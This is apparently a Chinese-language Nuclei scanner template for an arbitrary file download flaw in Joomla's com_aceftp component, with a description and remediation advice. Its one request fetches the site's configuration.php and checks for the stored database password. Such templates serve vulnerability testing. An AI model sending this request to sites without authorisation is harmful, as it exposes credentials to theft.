id: Joomla-sqli-aceftp
info:
  name: Joomla com aceftp 任意文件下载漏洞
  author:
  - 折跃
  description: |-
    Joomla! aceftp组件任意文件下载漏洞
    Joomla! 是一款开放源码的内容管理系统(CMS)。

    Joomla! com aceftp /administrator/components/com_aceftp/quixplorer/index.php存在任意文件下载漏洞。攻击者可利用该漏洞读取任意文件。
  severity: medium
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：
    http://www.joomla.org/

    临时修复方案：
    1、过滤\".\"，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - contains(body,'public $password')
  path:
  - '{{BaseURL}}/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
variables:
  verify: '{{rand_text_alphanumeric(32,"")}}'
